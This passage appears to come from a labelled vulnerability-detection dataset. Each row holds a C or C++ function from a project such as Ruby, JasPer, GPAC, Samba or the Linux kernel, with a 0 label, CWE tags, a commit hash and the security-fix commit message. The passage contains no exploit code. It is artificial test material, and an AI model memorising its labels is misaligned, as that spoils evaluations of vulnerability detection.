bug. Fix the bug by testing for a null password in check_1_6_dummy.
CVSSv2 vector: AV:N/AC:M/Au:S/C:N/I:N/A:P/E:H/RL:O/RC:C
[[email protected]: Minor style change and commit message]
ticket: 7152
target_version: 1.10.2
tags: pullup
|
rsock_init_unixsocket(void)
{
#ifdef HAVE_SYS_UN_H
/*
* Document-class: UNIXSocket < BasicSocket
*
* UNIXSocket represents a UNIX domain stream client socket.
*/
rb_cUNIXSocket = rb_define_class("UNIXSocket", rb_cBasicSocket);
rb_define_method(rb_cUNIXSocket, "initialize", unix_init, 1);
rb_define_method(rb_cUNIXSocket, "path", unix_path, 0);
rb_define_method(rb_cUNIXSocket, "addr", unix_addr, 0);
rb_define_method(rb_cUNIXSocket, "peeraddr", unix_peeraddr, 0);
rb_define_method(rb_cUNIXSocket, "recvfrom", unix_recvfrom, -1);
rb_define_method(rb_cUNIXSocket, "send_io", unix_send_io, 1);
rb_define_method(rb_cUNIXSocket, "recv_io", unix_recv_io, -1);
rb_define_singleton_method(rb_cUNIXSocket, "socketpair", unix_s_socketpair, -1);
rb_define_singleton_method(rb_cUNIXSocket, "pair", unix_s_socketpair, -1);
#endif
}
| 0 |
[
"CWE-20"
] |
ruby
|
8794dec6a5f11adc5cdd19a5ee91ea6b0816763f
| 334,363,784,335,377,800,000,000,000,000,000,000,000 | 20 |
unixsocket.c: check NUL bytes
* ext/socket/unixsocket.c (rsock_init_unixsock): check NUL bytes.
https://hackerone.com/reports/302997
git-svn-id: svn+ssh://ci.ruby-lang.org/ruby/trunk@62991 b2dd03c8-39d4-4d8f-98ff-823fe69b080e
|
static int jpc_dec_process_siz(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_siz_t *siz = &ms->parms.siz;
int compno;
int tileno;
jpc_dec_tile_t *tile;
jpc_dec_tcomp_t *tcomp;
int htileno;
int vtileno;
jpc_dec_cmpt_t *cmpt;
size_t size;
dec->xstart = siz->xoff;
dec->ystart = siz->yoff;
dec->xend = siz->width;
dec->yend = siz->height;
dec->tilewidth = siz->tilewidth;
dec->tileheight = siz->tileheight;
dec->tilexoff = siz->tilexoff;
dec->tileyoff = siz->tileyoff;
dec->numcomps = siz->numcomps;
if (!(dec->cp = jpc_dec_cp_create(dec->numcomps))) {
return -1;
}
if (!(dec->cmpts = jas_alloc2(dec->numcomps, sizeof(jpc_dec_cmpt_t)))) {
return -1;
}
for (compno = 0, cmpt = dec->cmpts; compno < dec->numcomps; ++compno,
++cmpt) {
cmpt->prec = siz->comps[compno].prec;
cmpt->sgnd = siz->comps[compno].sgnd;
cmpt->hstep = siz->comps[compno].hsamp;
cmpt->vstep = siz->comps[compno].vsamp;
cmpt->width = JPC_CEILDIV(dec->xend, cmpt->hstep) -
JPC_CEILDIV(dec->xstart, cmpt->hstep);
cmpt->height = JPC_CEILDIV(dec->yend, cmpt->vstep) -
JPC_CEILDIV(dec->ystart, cmpt->vstep);
cmpt->hsubstep = 0;
cmpt->vsubstep = 0;
}
dec->image = 0;
dec->numhtiles = JPC_CEILDIV(dec->xend - dec->tilexoff, dec->tilewidth);
dec->numvtiles = JPC_CEILDIV(dec->yend - dec->tileyoff, dec->tileheight);
if (!jas_safe_size_mul(dec->numhtiles, dec->numvtiles, &size)) {
return -1;
}
dec->numtiles = size;
JAS_DBGLOG(10, ("numtiles = %d; numhtiles = %d; numvtiles = %d;\n",
dec->numtiles, dec->numhtiles, dec->numvtiles));
if (!(dec->tiles = jas_alloc2(dec->numtiles, sizeof(jpc_dec_tile_t)))) {
return -1;
}
for (tileno = 0, tile = dec->tiles; tileno < dec->numtiles; ++tileno,
++tile) {
htileno = tileno % dec->numhtiles;
vtileno = tileno / dec->numhtiles;
tile->realmode = 0;
tile->state = JPC_TILE_INIT;
tile->xstart = JAS_MAX(dec->tilexoff + htileno * dec->tilewidth,
dec->xstart);
tile->ystart = JAS_MAX(dec->tileyoff + vtileno * dec->tileheight,
dec->ystart);
tile->xend = JAS_MIN(dec->tilexoff + (htileno + 1) *
dec->tilewidth, dec->xend);
tile->yend = JAS_MIN(dec->tileyoff + (vtileno + 1) *
dec->tileheight, dec->yend);
tile->numparts = 0;
tile->partno = 0;
tile->pkthdrstream = 0;
tile->pkthdrstreampos = 0;
tile->pptstab = 0;
tile->cp = 0;
tile->pi = 0;
if (!(tile->tcomps = jas_alloc2(dec->numcomps,
sizeof(jpc_dec_tcomp_t)))) {
return -1;
}
for (compno = 0, cmpt = dec->cmpts, tcomp = tile->tcomps;
compno < dec->numcomps; ++compno, ++cmpt, ++tcomp) {
tcomp->rlvls = 0;
tcomp->numrlvls = 0;
tcomp->data = 0;
tcomp->xstart = JPC_CEILDIV(tile->xstart, cmpt->hstep);
tcomp->ystart = JPC_CEILDIV(tile->ystart, cmpt->vstep);
tcomp->xend = JPC_CEILDIV(tile->xend, cmpt->hstep);
tcomp->yend = JPC_CEILDIV(tile->yend, cmpt->vstep);
tcomp->tsfb = 0;
}
}
dec->pkthdrstreams = 0;
/* We should expect to encounter other main header marker segments
or an SOT marker segment next. */
dec->state = JPC_MH;
return 0;
}
| 0 |
[
"CWE-20",
"CWE-399"
] |
jasper
|
ba2b9d000660313af7b692542afbd374c5685865
| 67,536,564,840,354,760,000,000,000,000,000,000,000 | 104 |
Ensure that not all tiles lie outside the image area.
|
static void
yy_reduce_print (yytype_int16 *yyssp, YYSTYPE *yyvsp, int yyrule, void *yyscanner, HEX_LEX_ENVIRONMENT *lex_env)
{
unsigned long int yylno = yyrline[yyrule];
int yynrhs = yyr2[yyrule];
int yyi;
YYFPRINTF (stderr, "Reducing stack by rule %d (line %lu):\n",
yyrule - 1, yylno);
/* The symbols being reduced. */
for (yyi = 0; yyi < yynrhs; yyi++)
{
YYFPRINTF (stderr, " $%d = ", yyi + 1);
yy_symbol_print (stderr,
yystos[yyssp[yyi + 1 - yynrhs]],
&(yyvsp[(yyi + 1) - (yynrhs)])
, yyscanner, lex_env);
YYFPRINTF (stderr, "\n");
| 0 |
[
"CWE-674",
"CWE-787"
] |
yara
|
10e8bd3071677dd1fa76beeef4bc2fc427cea5e7
| 6,727,116,766,566,016,000,000,000,000,000,000,000 | 18 |
Fix issue #674 for hex strings.
|
static GF_Err gf_isom_check_mvc(GF_ISOFile *the_file, GF_TrackBox *trak, GF_MPEGVisualSampleEntryBox *entry)
{
u32 i;
GF_Box *mvci;
GF_MultiviewGroupBox *mvcg;
GF_ViewIdentifierBox *vwid;
if (entry->mvc_config) {}
else if (entry->avc_config && entry->avc_config->config && entry->avc_config->config->sequenceParameterSetExtensions) {}
else
return GF_OK;
mvci = gf_isom_box_find_child(trak->Media->information->child_boxes, GF_ISOM_BOX_TYPE_MVCI);
if (!mvci) {
mvci = gf_isom_box_new_parent(&trak->Media->information->child_boxes, GF_ISOM_BOX_TYPE_MVCI);
if (!mvci) return GF_OUT_OF_MEM;
}
mvcg = (GF_MultiviewGroupBox *) gf_isom_box_find_child(mvci->child_boxes, GF_ISOM_BOX_TYPE_MVCG);
if (!mvcg) {
mvcg = (GF_MultiviewGroupBox *)gf_isom_box_new_parent(&mvci->child_boxes, GF_ISOM_BOX_TYPE_MVCG);
if (!mvcg) return GF_OUT_OF_MEM;
}
//this is very crude, we should try to parse the bitstream to fill these
mvcg->num_entries = 0;
if (mvcg->entries) {
gf_free(mvcg->entries);
mvcg->entries = NULL;
}
if (entry->avc_config) {
if (gf_list_count(entry->avc_config->config->sequenceParameterSets))
mvcg->num_entries += 1;
mvcg->num_entries += gf_list_count(entry->avc_config->config->sequenceParameterSetExtensions);
}
if (entry->mvc_config && entry->mvc_config->config) {
mvcg->num_entries += gf_list_count(entry->mvc_config->config->sequenceParameterSets);
}
mvcg->entries = gf_malloc(sizeof(MVCIEntry)*mvcg->num_entries);
if (!mvcg->entries) return GF_OUT_OF_MEM;
memset(mvcg->entries, 0, sizeof(MVCIEntry)*mvcg->num_entries);
for (i=0; i<mvcg->num_entries; i++) {
mvcg->entries[i].entry_type = 2;
mvcg->entries[i].output_view_id = i;
}
vwid = (GF_ViewIdentifierBox *) gf_isom_box_find_child(entry->child_boxes, GF_ISOM_BOX_TYPE_VWID);
if (!vwid) {
vwid = (GF_ViewIdentifierBox *)gf_isom_box_new_parent(&entry->child_boxes, GF_ISOM_BOX_TYPE_VWID);
if (!mvcg) return GF_OUT_OF_MEM;
}
if (vwid->views) gf_free(vwid->views);
vwid->num_views = mvcg->num_entries;
vwid->views = gf_malloc(sizeof(ViewIDEntry)*vwid->num_views);
if (!vwid->views) return GF_OUT_OF_MEM;
memset(vwid->views, 0, sizeof(ViewIDEntry)*vwid->num_views);
for (i=0; i<vwid->num_views; i++) {
vwid->views[i].base_view_type = i ? 0 : 1;
vwid->views[i].view_id = i;
vwid->views[i].view_order_index = i;
}
return GF_OK;
}
| 0 |
[
"CWE-401"
] |
gpac
|
0a85029d694f992f3631e2f249e4999daee15cbf
| 55,282,365,399,051,010,000,000,000,000,000,000,000 | 62 |
fixed #1785 (fuzz)
|
TEST(RoleGraphTest, AddRoleFromDocumentWithRestricitonMerge) {
const BSONArray roleARestrictions = BSON_ARRAY(BSON("clientSource" << BSON_ARRAY("::1/128")));
const BSONArray roleBRestrictions =
BSON_ARRAY(BSON("serverAddress" << BSON_ARRAY("127.0.0.1/8")));
RoleGraph graph;
ASSERT_OK(graph.addRoleFromDocument(BSON("_id"
<< "dbA.roleA"
<< "role"
<< "roleA"
<< "db"
<< "dbA"
<< "privileges"
<< BSONArray()
<< "roles"
<< BSONArray()
<< "authenticationRestrictions"
<< roleARestrictions)));
ASSERT_OK(graph.addRoleFromDocument(BSON("_id"
<< "dbB.roleB"
<< "role"
<< "roleB"
<< "db"
<< "dbB"
<< "privileges"
<< BSONArray()
<< "roles"
<< BSON_ARRAY(BSON("role"
<< "roleA"
<< "db"
<< "dbA"))
<< "authenticationRestrictions"
<< roleBRestrictions)));
ASSERT_OK(graph.recomputePrivilegeData());
const auto A = graph.getDirectAuthenticationRestrictions(RoleName("roleA", "dbA"));
const auto B = graph.getDirectAuthenticationRestrictions(RoleName("roleB", "dbB"));
const auto gaar = graph.getAllAuthenticationRestrictions(RoleName("roleB", "dbB"));
ASSERT_TRUE(std::any_of(gaar.begin(), gaar.end(), [A](const auto& r) { return A == r; }));
ASSERT_TRUE(std::any_of(gaar.begin(), gaar.end(), [B](const auto& r) { return B == r; }));
}
| 0 |
[
"CWE-863"
] |
mongo
|
fb87cc88ecb5d300f14cda7bc238d7d5132118f5
| 10,862,676,005,022,104,000,000,000,000,000,000,000 | 41 |
SERVER-45472 Ensure RoleGraph can serialize authentication restrictions to BSON
(cherry picked from commit 521e56b407ac72bc69a97a24d1253f51a5b6e81b)
(cherry picked from commit a10d0a22d5d009d27664967181042933ec1bef36)
|
static Value make(const T &value) {
#ifdef __clang__
Value result = MakeValue<Formatter>(value);
// Workaround a bug in Apple LLVM version 4.2 (clang-425.0.28) of clang:
// https://github.com/fmtlib/fmt/issues/276
(void)result.custom.format;
return result;
#else
return MakeValue<Formatter>(value);
#endif
}
| 0 |
[
"CWE-134",
"CWE-119",
"CWE-787"
] |
fmt
|
8cf30aa2be256eba07bb1cefb998c52326e846e7
| 93,471,850,034,553,520,000,000,000,000,000,000,000 | 11 |
Fix segfault on complex pointer formatting (#642)
|
static int vfswrap_close(vfs_handle_struct *handle, files_struct *fsp)
{
int result;
START_PROFILE(syscall_close);
result = fd_close_posix(fsp);
END_PROFILE(syscall_close);
return result;
}
| 0 |
[
"CWE-665"
] |
samba
|
30e724cbff1ecd90e5a676831902d1e41ec1b347
| 160,131,800,265,065,110,000,000,000,000,000,000,000 | 9 |
FSCTL_GET_SHADOW_COPY_DATA: Initialize output array to zero
Otherwise num_volumes and the end marker can return uninitialized data
to the client.
Signed-off-by: Christof Schmitt <[email protected]>
Reviewed-by: Jeremy Allison <[email protected]>
Reviewed-by: Simo Sorce <[email protected]>
|
mysql_getopt_value(const char *keyname, uint key_length,
const struct my_option *option, int *error)
{
if (error)
*error= 0;
switch (option->id) {
case OPT_KEY_BUFFER_SIZE:
case OPT_KEY_CACHE_BLOCK_SIZE:
case OPT_KEY_CACHE_DIVISION_LIMIT:
case OPT_KEY_CACHE_AGE_THRESHOLD:
case OPT_KEY_CACHE_PARTITIONS:
{
KEY_CACHE *key_cache;
if (!(key_cache= get_or_create_key_cache(keyname, key_length)))
{
if (error)
*error= EXIT_OUT_OF_MEMORY;
return 0;
}
switch (option->id) {
case OPT_KEY_BUFFER_SIZE:
return &key_cache->param_buff_size;
case OPT_KEY_CACHE_BLOCK_SIZE:
return &key_cache->param_block_size;
case OPT_KEY_CACHE_DIVISION_LIMIT:
return &key_cache->param_division_limit;
case OPT_KEY_CACHE_AGE_THRESHOLD:
return &key_cache->param_age_threshold;
case OPT_KEY_CACHE_PARTITIONS:
return (uchar**) &key_cache->param_partitions;
}
}
}
return option->value;
}
| 0 |
[
"CWE-362"
] |
server
|
347eeefbfc658c8531878218487d729f4e020805
| 147,811,675,341,782,560,000,000,000,000,000,000,000 | 35 |
don't use my_copystat in the server
it was supposed to be used in command-line tools only.
Different fix for 4e5473862e:
Bug#24388746: PRIVILEGE ESCALATION AND RACE CONDITION USING CREATE TABLE
|
uint64_t address_space_ldq(AddressSpace *as, hwaddr addr,
MemTxAttrs attrs, MemTxResult *result)
{
return address_space_ldq_internal(as, addr, attrs, result,
DEVICE_NATIVE_ENDIAN);
}
| 0 |
[] |
qemu
|
e4a511f8cc6f4a46d409fb5c9f72c38ba45f8d83
| 267,459,853,572,134,740,000,000,000,000,000,000,000 | 6 |
exec: clamp accesses against the MemoryRegionSection
Because the clamping was done against the MemoryRegion,
address_space_rw was effectively broken if a write spanned
multiple sections that are not linear in underlying memory
(with the memory not being under an IOMMU).
This is visible with the MIPS rc4030 IOMMU, which is implemented
as a series of alias memory regions that point to the actual RAM.
Tested-by: Hervé Poussineau <[email protected]>
Tested-by: Mark Cave-Ayland <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
static char *savemem(struct nfsd4_compoundargs *argp, __be32 *p, int nbytes)
{
void *ret;
ret = svcxdr_tmpalloc(argp, nbytes);
if (!ret)
return NULL;
memcpy(ret, p, nbytes);
return ret;
}
| 0 |
[
"CWE-20",
"CWE-129"
] |
linux
|
f961e3f2acae94b727380c0b74e2d3954d0edf79
| 12,672,629,511,864,062,000,000,000,000,000,000,000 | 10 |
nfsd: encoders mustn't use unitialized values in error cases
In error cases, lgp->lg_layout_type may be out of bounds; so we
shouldn't be using it until after the check of nfserr.
This was seen to crash nfsd threads when the server receives a LAYOUTGET
request with a large layout type.
GETDEVICEINFO has the same problem.
Reported-by: Ari Kauppi <[email protected]>
Reviewed-by: Christoph Hellwig <[email protected]>
Cc: [email protected]
Signed-off-by: J. Bruce Fields <[email protected]>
|
DLLIMPORT cfg_value_t *cfg_setopt(cfg_t *cfg, cfg_opt_t *opt, const char *value)
{
cfg_value_t *val = NULL;
const char *s;
char *endptr;
long int i;
double f;
void *p;
int b;
if (!cfg || !opt) {
errno = EINVAL;
return NULL;
}
if (opt->simple_value.ptr) {
if (opt->type == CFGT_SEC) {
errno = EINVAL;
return NULL;
}
val = (cfg_value_t *)opt->simple_value.ptr;
} else {
if (is_set(CFGF_RESET, opt->flags)) {
cfg_free_value(opt);
opt->flags &= ~CFGF_RESET;
}
if (opt->nvalues == 0 || is_set(CFGF_MULTI, opt->flags) || is_set(CFGF_LIST, opt->flags)) {
val = NULL;
if (opt->type == CFGT_SEC && is_set(CFGF_TITLE, opt->flags)) {
unsigned int i;
/* XXX: Check if there already is a section with the same title. */
/*
* Check there are either no sections at
* all, or a non-NULL section title.
*/
if (opt->nvalues != 0 && !value) {
errno = EINVAL;
return NULL;
}
for (i = 0; i < opt->nvalues && val == NULL; i++) {
cfg_t *sec = opt->values[i]->section;
if (is_set(CFGF_NOCASE, cfg->flags)) {
if (strcasecmp(value, sec->title) == 0)
val = opt->values[i];
} else {
if (strcmp(value, sec->title) == 0)
val = opt->values[i];
}
}
if (val && is_set(CFGF_NO_TITLE_DUPES, opt->flags)) {
cfg_error(cfg, _("found duplicate title '%s'"), value);
return NULL;
}
}
if (!val) {
val = cfg_addval(opt);
if (!val)
return NULL;
}
} else {
val = opt->values[0];
}
}
switch (opt->type) {
case CFGT_INT:
if (opt->parsecb) {
if ((*opt->parsecb) (cfg, opt, value, &i) != 0)
return NULL;
} else {
const char *str;
int radix = 0;
if (!value) {
errno = EINVAL;
return NULL;
}
str = value;
if (value[0] == '0') {
switch (value[1]) {
case 'b':
radix = 2;
str = &value[2];
break;
case 'x':
radix = 16;
str = &value[2];
break;
default:
radix = 8;
str = &value[1];
}
}
i = strtol(str, &endptr, radix);
if (*endptr != '\0') {
cfg_error(cfg, _("invalid integer value for option '%s'"), opt->name);
return NULL;
}
if (errno == ERANGE) {
cfg_error(cfg, _("integer value for option '%s' is out of range"), opt->name);
return NULL;
}
}
val->number = i;
break;
case CFGT_FLOAT:
if (opt->parsecb) {
if ((*opt->parsecb) (cfg, opt, value, &f) != 0)
return NULL;
} else {
if (!value) {
errno = EINVAL;
return NULL;
}
f = strtod(value, &endptr);
if (*endptr != '\0') {
cfg_error(cfg, _("invalid floating point value for option '%s'"), opt->name);
return NULL;
}
if (errno == ERANGE) {
cfg_error(cfg, _("floating point value for option '%s' is out of range"), opt->name);
return NULL;
}
}
val->fpnumber = f;
break;
case CFGT_STR:
if (opt->parsecb) {
s = NULL;
if ((*opt->parsecb) (cfg, opt, value, &s) != 0)
return NULL;
} else {
s = value;
}
if (!s) {
errno = EINVAL;
return NULL;
}
free(val->string);
val->string = strdup(s);
if (!val->string)
return NULL;
break;
case CFGT_SEC:
if (is_set(CFGF_MULTI, opt->flags) || val->section == NULL) {
if (val->section) {
val->section->path = NULL; /* Global search path */
cfg_free(val->section);
}
val->section = calloc(1, sizeof(cfg_t));
if (!val->section)
return NULL;
val->section->name = strdup(opt->name);
if (!val->section->name) {
free(val->section);
return NULL;
}
val->section->flags = cfg->flags;
if (is_set(CFGF_KEYSTRVAL, opt->flags))
val->section->flags |= CFGF_KEYSTRVAL;
val->section->filename = cfg->filename ? strdup(cfg->filename) : NULL;
if (cfg->filename && !val->section->filename) {
free(val->section->name);
free(val->section);
return NULL;
}
val->section->line = cfg->line;
val->section->errfunc = cfg->errfunc;
val->section->title = value ? strdup(value) : NULL;
if (value && !val->section->title) {
free(val->section->filename);
free(val->section->name);
free(val->section);
return NULL;
}
val->section->opts = cfg_dupopt_array(opt->subopts);
if (!val->section->opts) {
if (val->section->title)
free(val->section->title);
if (val->section->filename)
free(val->section->filename);
free(val->section->name);
free(val->section);
return NULL;
}
}
if (!is_set(CFGF_DEFINIT, opt->flags))
cfg_init_defaults(val->section);
break;
case CFGT_BOOL:
if (opt->parsecb) {
if ((*opt->parsecb) (cfg, opt, value, &b) != 0)
return NULL;
} else {
b = cfg_parse_boolean(value);
if (b == -1) {
cfg_error(cfg, _("invalid boolean value for option '%s'"), opt->name);
return NULL;
}
}
val->boolean = (cfg_bool_t)b;
break;
case CFGT_PTR:
if (!opt->parsecb) {
errno = EINVAL;
return NULL;
}
if ((*opt->parsecb) (cfg, opt, value, &p) != 0)
return NULL;
if (val->ptr && opt->freecb)
opt->freecb(val->ptr);
val->ptr = p;
break;
default:
cfg_error(cfg, "internal error in cfg_setopt(%s, %s)", opt->name, (value) ? (value) : "NULL");
return NULL;
}
opt->flags |= CFGF_MODIFIED;
return val;
}
| 0 |
[] |
libconfuse
|
d73777c2c3566fb2647727bb56d9a2295b81669b
| 41,006,029,488,040,584,000,000,000,000,000,000,000 | 247 |
Fix #163: unterminated username used with getpwnam()
Signed-off-by: Joachim Wiberg <[email protected]>
|
long dtls1_default_timeout(void)
{
/*
* 2 hours, the 24 hours mentioned in the DTLSv1 spec is way too long for
* http, the cache would over fill
*/
return (60 * 60 * 2);
}
| 0 |
[] |
openssl
|
819418110b6fff4a7b96f01a5d68f71df3e3b736
| 201,929,948,417,343,100,000,000,000,000,000,000,000 | 8 |
Fix Seg fault in DTLSv1_listen
The DTLSv1_listen function is intended to be stateless and processes
the initial ClientHello from many peers. It is common for user code to
loop over the call to DTLSv1_listen until a valid ClientHello is received
with an associated cookie. A defect in the implementation of DTLSv1_listen
means that state is preserved in the SSL object from one invokation to the
next that can lead to a segmentation fault. Erorrs processing the initial
ClientHello can trigger this scenario. An example of such an error could
be that a DTLS1.0 only client is attempting to connect to a DTLS1.2 only
server.
CVE-2015-0207
Reviewed-by: Richard Levitte <[email protected]>
|
get_keygrip (int pubkey_algo, const char *curve, gcry_mpi_t *pkey,
unsigned char *grip)
{
gpg_error_t err;
gcry_sexp_t s_pkey = NULL;
switch (pubkey_algo)
{
case GCRY_PK_DSA:
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(dsa(p%m)(q%m)(g%m)(y%m)))",
pkey[0], pkey[1], pkey[2], pkey[3]);
break;
case GCRY_PK_ELG:
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(elg(p%m)(g%m)(y%m)))",
pkey[0], pkey[1], pkey[2]);
break;
case GCRY_PK_RSA:
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(rsa(n%m)(e%m)))", pkey[0], pkey[1]);
break;
case GCRY_PK_ECC:
if (!curve)
err = gpg_error (GPG_ERR_BAD_SECKEY);
else if (!strcmp (curve, openpgp_curve_to_oid ("Ed25519", NULL)))
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(ecc(curve %s)(flags eddsa)(q%m)))",
"Ed25519", pkey[0]);
else
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(ecc(curve %s)(q%m)))",
curve, pkey[0]);
break;
default:
err = gpg_error (GPG_ERR_PUBKEY_ALGO);
break;
}
if (!err && !gcry_pk_get_keygrip (s_pkey, grip))
err = gpg_error (GPG_ERR_INTERNAL);
gcry_sexp_release (s_pkey);
return err;
}
| 0 |
[
"CWE-20"
] |
gnupg
|
2183683bd633818dd031b090b5530951de76f392
| 65,161,869,208,081,990,000,000,000,000,000,000,000 | 49 |
Use inline functions to convert buffer data to scalars.
* common/host2net.h (buf16_to_ulong, buf16_to_uint): New.
(buf16_to_ushort, buf16_to_u16): New.
(buf32_to_size_t, buf32_to_ulong, buf32_to_uint, buf32_to_u32): New.
--
Commit 91b826a38880fd8a989318585eb502582636ddd8 was not enough to
avoid all sign extension on shift problems. Hanno Böck found a case
with an invalid read due to this problem. To fix that once and for
all almost all uses of "<< 24" and "<< 8" are changed by this patch to
use an inline function from host2net.h.
Signed-off-by: Werner Koch <[email protected]>
|
static unsigned char convert_num_notes_to_fanout(uintmax_t num_notes)
{
unsigned char fanout = 0;
while ((num_notes >>= 8))
fanout++;
return fanout;
}
| 0 |
[] |
git
|
68061e3470210703cb15594194718d35094afdc0
| 177,869,693,306,201,060,000,000,000,000,000,000,000 | 7 |
fast-import: disallow "feature export-marks" by default
The fast-import stream command "feature export-marks=<path>" lets the
stream write marks to an arbitrary path. This may be surprising if you
are running fast-import against an untrusted input (which otherwise
cannot do anything except update Git objects and refs).
Let's disallow the use of this feature by default, and provide a
command-line option to re-enable it (you can always just use the
command-line --export-marks as well, but the in-stream version provides
an easy way for exporters to control the process).
This is a backwards-incompatible change, since the default is flipping
to the new, safer behavior. However, since the main users of the
in-stream versions would be import/export-based remote helpers, and
since we trust remote helpers already (which are already running
arbitrary code), we'll pass the new option by default when reading a
remote helper's stream. This should minimize the impact.
Note that the implementation isn't totally simple, as we have to work
around the fact that fast-import doesn't parse its command-line options
until after it has read any "feature" lines from the stream. This is how
it lets command-line options override in-stream. But in our case, it's
important to parse the new --allow-unsafe-features first.
There are three options for resolving this:
1. Do a separate "early" pass over the options. This is easy for us to
do because there are no command-line options that allow the
"unstuck" form (so there's no chance of us mistaking an argument
for an option), though it does introduce a risk of incorrect
parsing later (e.g,. if we convert to parse-options).
2. Move the option parsing phase back to the start of the program, but
teach the stream-reading code never to override an existing value.
This is tricky, because stream "feature" lines override each other
(meaning we'd have to start tracking the source for every option).
3. Accept that we might parse a "feature export-marks" line that is
forbidden, as long we don't _act_ on it until after we've parsed
the command line options.
This would, in fact, work with the current code, but only because
the previous patch fixed the export-marks parser to avoid touching
the filesystem.
So while it works, it does carry risk of somebody getting it wrong
in the future in a rather subtle and unsafe way.
I've gone with option (1) here as simple, safe, and unlikely to cause
regressions.
This fixes CVE-2019-1348.
Signed-off-by: Jeff King <[email protected]>
|
void InstanceKlass::purge_previous_version_list() {
assert(SafepointSynchronize::is_at_safepoint(), "only called at safepoint");
assert(has_been_redefined(), "Should only be called for main class");
// Quick exit.
if (previous_versions() == NULL) {
return;
}
// This klass has previous versions so see what we can cleanup
// while it is safe to do so.
int deleted_count = 0; // leave debugging breadcrumbs
int live_count = 0;
ClassLoaderData* loader_data = class_loader_data();
assert(loader_data != NULL, "should never be null");
ResourceMark rm;
log_trace(redefine, class, iklass, purge)("%s: previous versions", external_name());
// previous versions are linked together through the InstanceKlass
InstanceKlass* pv_node = previous_versions();
InstanceKlass* last = this;
int version = 0;
// check the previous versions list
for (; pv_node != NULL; ) {
ConstantPool* pvcp = pv_node->constants();
assert(pvcp != NULL, "cp ref was unexpectedly cleared");
if (!pvcp->on_stack()) {
// If the constant pool isn't on stack, none of the methods
// are executing. Unlink this previous_version.
// The previous version InstanceKlass is on the ClassLoaderData deallocate list
// so will be deallocated during the next phase of class unloading.
log_trace(redefine, class, iklass, purge)
("previous version " INTPTR_FORMAT " is dead.", p2i(pv_node));
// For debugging purposes.
pv_node->set_is_scratch_class();
// Unlink from previous version list.
assert(pv_node->class_loader_data() == loader_data, "wrong loader_data");
InstanceKlass* next = pv_node->previous_versions();
pv_node->link_previous_versions(NULL); // point next to NULL
last->link_previous_versions(next);
// Delete this node directly. Nothing is referring to it and we don't
// want it to increase the counter for metadata to delete in CLDG.
MetadataFactory::free_metadata(loader_data, pv_node);
pv_node = next;
deleted_count++;
version++;
continue;
} else {
log_trace(redefine, class, iklass, purge)("previous version " INTPTR_FORMAT " is alive", p2i(pv_node));
assert(pvcp->pool_holder() != NULL, "Constant pool with no holder");
guarantee (!loader_data->is_unloading(), "unloaded classes can't be on the stack");
live_count++;
// found a previous version for next time we do class unloading
_has_previous_versions = true;
}
// next previous version
last = pv_node;
pv_node = pv_node->previous_versions();
version++;
}
log_trace(redefine, class, iklass, purge)
("previous version stats: live=%d, deleted=%d", live_count, deleted_count);
}
| 0 |
[] |
jdk17u
|
f8eb9abe034f7c6bea4da05a9ea42017b3f80730
| 43,675,006,754,265,100,000,000,000,000,000,000,000 | 69 |
8270386: Better verification of scan methods
Reviewed-by: coleenp
Backport-of: ac329cef45979bd0159ecd1347e36f7129bb2ce4
|
static VALUE cState_initialize(int argc, VALUE *argv, VALUE self)
{
VALUE opts;
GET_STATE(self);
state->max_nesting = 100;
state->buffer_initial_length = FBUFFER_INITIAL_LENGTH_DEFAULT;
rb_scan_args(argc, argv, "01", &opts);
if (!NIL_P(opts)) cState_configure(self, opts);
return self;
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
json
|
8f782fd8e181d9cfe9387ded43a5ca9692266b85
| 33,301,476,397,015,310,000,000,000,000,000,000,000 | 10 |
Fix arbitrary heap exposure problem
|
void sctp_packet_free(struct sctp_packet *packet)
{
struct sctp_chunk *chunk, *tmp;
SCTP_DEBUG_PRINTK("%s: packet:%p\n", __func__, packet);
list_for_each_entry_safe(chunk, tmp, &packet->chunk_list, list) {
list_del_init(&chunk->list);
sctp_chunk_free(chunk);
}
if (packet->malloced)
kfree(packet);
}
| 0 |
[] |
linux
|
196d67593439b03088913227093e374235596e33
| 281,072,648,790,618,220,000,000,000,000,000,000,000 | 14 |
sctp: Add support to per-association statistics via a new SCTP_GET_ASSOC_STATS call
The current SCTP stack is lacking a mechanism to have per association
statistics. This is an implementation modeled after OpenSolaris'
SCTP_GET_ASSOC_STATS.
Userspace part will follow on lksctp if/when there is a general ACK on
this.
V4:
- Move ipackets++ before q->immediate.func() for consistency reasons
- Move sctp_max_rto() at the end of sctp_transport_update_rto() to avoid
returning bogus RTO values
- return asoc->rto_min when max_obs_rto value has not changed
V3:
- Increase ictrlchunks in sctp_assoc_bh_rcv() as well
- Move ipackets++ to sctp_inq_push()
- return 0 when no rto updates took place since the last call
V2:
- Implement partial retrieval of stat struct to cope for future expansion
- Kill the rtxpackets counter as it cannot be precise anyway
- Rename outseqtsns to outofseqtsns to make it clearer that these are out
of sequence unexpected TSNs
- Move asoc->ipackets++ under a lock to avoid potential miscounts
- Fold asoc->opackets++ into the already existing asoc check
- Kill unneeded (q->asoc) test when increasing rtxchunks
- Do not count octrlchunks if sending failed (SCTP_XMIT_OK != 0)
- Don't count SHUTDOWNs as SACKs
- Move SCTP_GET_ASSOC_STATS to the private space API
- Adjust the len check in sctp_getsockopt_assoc_stats() to allow for
future struct growth
- Move association statistics in their own struct
- Update idupchunks when we send a SACK with dup TSNs
- return min_rto in max_rto when RTO has not changed. Also return the
transport when max_rto last changed.
Signed-off: Michele Baldessari <[email protected]>
Acked-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static bool kvm_vcpu_write_protect_gfn(struct kvm_vcpu *vcpu, u64 gfn)
{
struct kvm_memory_slot *slot;
slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn);
return kvm_mmu_slot_gfn_write_protect(vcpu->kvm, slot, gfn, PG_LEVEL_4K);
}
| 0 |
[
"CWE-476"
] |
linux
|
9f46c187e2e680ecd9de7983e4d081c3391acc76
| 45,496,953,058,833,130,000,000,000,000,000,000,000 | 7 |
KVM: x86/mmu: fix NULL pointer dereference on guest INVPCID
With shadow paging enabled, the INVPCID instruction results in a call
